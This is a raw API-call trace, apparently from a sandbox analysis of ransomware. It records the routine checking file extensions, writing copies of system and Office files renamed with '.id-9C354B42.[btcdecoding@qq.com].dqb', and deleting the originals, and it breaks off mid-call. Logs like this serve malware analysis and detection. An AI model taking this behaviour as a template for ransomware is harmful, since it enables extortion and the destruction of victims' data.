[0053.612] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0053.612] lstrlenW (lpString=".7z") returned 3 [0053.612] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0053.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0053.612] lstrlenW (lpString=".dbf") returned 4 [0053.612] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0053.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0053.612] lstrlenW (lpString=".1cd") returned 4 [0053.612] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0053.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0053.612] lstrlenW (lpString=".jpg") returned 4 [0053.612] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0053.612] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0053.612] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0053.612] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0053.613] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=3584) returned 1 [0053.613] CloseHandle (hObject=0x178) returned 1 [0053.613] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui")) returned 0x20 [0053.613] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.613] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.613] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0053.613] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0053.613] lstrlenW (lpString=".doc") returned 4 [0053.613] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0053.613] lstrlenW (lpString=".docx") returned 5 [0053.613] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0053.613] lstrlenW (lpString=".pdf") returned 4 [0053.613] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0053.613] lstrlenW (lpString=".xls") returned 4 [0053.613] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0053.613] lstrlenW (lpString=".xlsx") returned 5 [0053.613] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0053.614] lstrlenW (lpString=".ppt") returned 4 [0053.614] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0053.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0053.614] lstrlenW (lpString=".zip") returned 4 [0053.614] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0053.614] lstrlenW (lpString=".rar") returned 4 [0053.614] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0053.614] lstrlenW (lpString=".bz2") returned 4 [0053.614] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0053.614] lstrlenW (lpString=".7z") returned 3 [0053.614] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0053.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0053.614] lstrlenW (lpString=".dbf") returned 4 [0053.614] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0053.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0053.614] lstrlenW (lpString=".1cd") returned 4 [0053.614] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0053.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0053.614] lstrlenW (lpString=".jpg") returned 4 [0053.614] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0053.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0053.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0053.614] lstrlenW (lpString=".doc") returned 4 [0053.614] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0053.614] lstrlenW (lpString=".docx") returned 5 [0053.614] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0053.614] lstrlenW (lpString=".pdf") returned 4 [0053.614] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0053.614] lstrlenW (lpString=".xls") returned 4 [0053.614] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0053.614] lstrlenW (lpString=".xlsx") returned 5 [0053.614] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0053.614] lstrlenW (lpString=".ppt") returned 4 [0053.614] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0053.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0053.614] lstrlenW (lpString=".zip") returned 4 [0053.614] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0053.615] lstrlenW (lpString=".rar") returned 4 [0053.615] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0053.615] lstrlenW (lpString=".bz2") returned 4 [0053.615] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0053.615] lstrlenW (lpString=".7z") returned 3 [0053.615] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0053.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0053.615] lstrlenW (lpString=".dbf") returned 4 [0053.615] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0053.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0053.615] lstrlenW (lpString=".1cd") returned 4 [0053.615] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0053.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0053.615] lstrlenW (lpString=".jpg") returned 4 [0053.615] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0053.615] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0053.615] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0053.615] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0053.707] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=4096) returned 1 [0053.707] CloseHandle (hObject=0x184) returned 1 [0053.707] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui")) returned 0x20 [0053.707] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.707] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0053.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0053.707] lstrlenW (lpString=".doc") returned 4 [0053.707] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0053.707] lstrlenW (lpString=".docx") returned 5 [0053.707] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0053.707] lstrlenW (lpString=".pdf") returned 4 [0053.708] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0053.708] lstrlenW (lpString=".xls") returned 4 [0053.708] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0053.708] lstrlenW (lpString=".xlsx") returned 5 [0053.708] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0053.708] lstrlenW (lpString=".ppt") returned 4 [0053.708] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0053.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0053.708] lstrlenW (lpString=".zip") returned 4 [0053.708] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0053.708] lstrlenW (lpString=".rar") returned 4 [0053.708] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0053.708] lstrlenW (lpString=".bz2") returned 4 [0053.708] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0053.708] lstrlenW (lpString=".7z") returned 3 [0053.708] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0053.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0053.708] lstrlenW (lpString=".dbf") returned 4 [0053.708] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0054.356] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0054.360] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0054.361] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0054.376] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.376] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.376] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0054.377] GetLastError () returned 0x0 [0054.377] ReadFile (in: hFile=0x208, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x665a0, lpOverlapped=0x0) returned 1 [0054.387] WriteFile (in: hFile=0x224, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0x665b0, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0x665b0, lpOverlapped=0x0) returned 1 [0054.684] ReadFile (in: hFile=0x208, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.684] WriteFile (in: hFile=0x224, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0054.684] SetEndOfFile (hFile=0x224) returned 1 [0054.685] CloseHandle (hObject=0x224) returned 1 [0054.685] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.685] SetEndOfFile (hFile=0x208) returned 1 [0054.689] CloseHandle (hObject=0x208) returned 1 [0054.689] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0054.689] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll")) returned 1 [0054.689] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0054.689] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0054.689] lstrlenW (lpString=".doc") returned 4 [0054.689] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.689] lstrlenW (lpString=".docx") returned 5 [0054.689] lstrcmpiW (lpString1=".docx", lpString2="M.DLL") returned -1 [0054.689] lstrlenW (lpString=".pdf") returned 4 [0054.690] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.690] lstrlenW (lpString=".xls") returned 4 [0054.690] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.690] lstrlenW (lpString=".xlsx") returned 5 [0054.690] lstrcmpiW (lpString1=".xlsx", lpString2="M.DLL") returned -1 [0054.690] lstrlenW (lpString=".ppt") returned 4 [0054.690] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.690] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0054.690] lstrlenW (lpString=".zip") returned 4 [0054.690] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.690] lstrlenW (lpString=".rar") returned 4 [0054.690] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.690] lstrlenW (lpString=".bz2") returned 4 [0054.690] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.690] lstrlenW (lpString=".7z") returned 3 [0054.690] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.690] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0054.690] lstrlenW (lpString=".dbf") returned 4 [0054.690] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.690] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0054.690] lstrlenW (lpString=".1cd") returned 4 [0054.690] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.690] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0054.690] lstrlenW (lpString=".jpg") returned 4 [0054.690] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.690] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0054.690] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0054.690] lstrlenW (lpString=".doc") returned 4 [0054.690] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.690] lstrlenW (lpString=".docx") returned 5 [0054.690] lstrcmpiW (lpString1=".docx", lpString2="M.DLL") returned -1 [0054.690] lstrlenW (lpString=".pdf") returned 4 [0054.690] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.690] lstrlenW (lpString=".xls") returned 4 [0054.691] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.691] lstrlenW (lpString=".xlsx") returned 5 [0054.691] lstrcmpiW (lpString1=".xlsx", lpString2="M.DLL") returned -1 [0054.691] lstrlenW (lpString=".ppt") returned 4 [0054.691] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.691] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0054.691] lstrlenW (lpString=".zip") returned 4 [0054.691] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.691] lstrlenW (lpString=".rar") returned 4 [0054.691] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.691] lstrlenW (lpString=".bz2") returned 4 [0054.691] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.691] lstrlenW (lpString=".7z") returned 3 [0054.691] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.691] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0054.691] lstrlenW (lpString=".dbf") returned 4 [0054.691] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.691] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0054.691] lstrlenW (lpString=".1cd") returned 4 [0054.691] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.691] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0054.691] lstrlenW (lpString=".jpg") returned 4 [0054.691] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.691] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0054.691] lstrlenW (lpString="ALRTINTL.DLL") returned 12 [0054.691] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0054.692] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=154448) returned 1 [0054.692] CloseHandle (hObject=0x208) returned 1 [0054.692] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll")) returned 0x20 [0054.692] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0054.692] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0054.692] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.692] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.692] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0054.693] GetLastError () returned 0x0 [0054.693] ReadFile (in: hFile=0x208, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x25b50, lpOverlapped=0x0) returned 1 [0054.747] WriteFile (in: hFile=0x224, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0x25b60, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0x25b60, lpOverlapped=0x0) returned 1 [0054.750] ReadFile (in: hFile=0x208, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.750] WriteFile (in: hFile=0x224, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.750] SetEndOfFile (hFile=0x224) returned 1 [0054.751] CloseHandle (hObject=0x224) returned 1 [0054.751] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.751] SetEndOfFile (hFile=0x208) returned 1 [0054.752] CloseHandle (hObject=0x208) returned 1 [0054.752] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0054.753] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll")) returned 1 [0054.753] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0054.753] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0054.753] lstrlenW (lpString=".doc") returned 4 [0054.753] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.753] lstrlenW (lpString=".docx") returned 5 [0054.753] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0054.753] lstrlenW (lpString=".pdf") returned 4 [0054.753] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.753] lstrlenW (lpString=".xls") returned 4 [0054.753] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.753] lstrlenW (lpString=".xlsx") returned 5 [0054.753] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0054.753] lstrlenW (lpString=".ppt") returned 4 [0054.753] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.753] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0054.753] lstrlenW (lpString=".zip") returned 4 [0054.753] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.753] lstrlenW (lpString=".rar") returned 4 [0054.753] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.753] lstrlenW (lpString=".bz2") returned 4 [0054.753] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.753] lstrlenW (lpString=".7z") returned 3 [0054.754] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0054.754] lstrlenW (lpString=".dbf") returned 4 [0054.754] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0054.754] lstrlenW (lpString=".1cd") returned 4 [0054.754] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0054.754] lstrlenW (lpString=".jpg") returned 4 [0054.754] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0054.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0054.754] lstrlenW (lpString=".doc") returned 4 [0054.754] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.754] lstrlenW (lpString=".docx") returned 5 [0054.754] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0054.754] lstrlenW (lpString=".pdf") returned 4 [0054.754] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.754] lstrlenW (lpString=".xls") returned 4 [0054.754] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.754] lstrlenW (lpString=".xlsx") returned 5 [0054.754] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0054.754] lstrlenW (lpString=".ppt") returned 4 [0054.754] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0054.754] lstrlenW (lpString=".zip") returned 4 [0054.754] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.754] lstrlenW (lpString=".rar") returned 4 [0054.754] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.754] lstrlenW 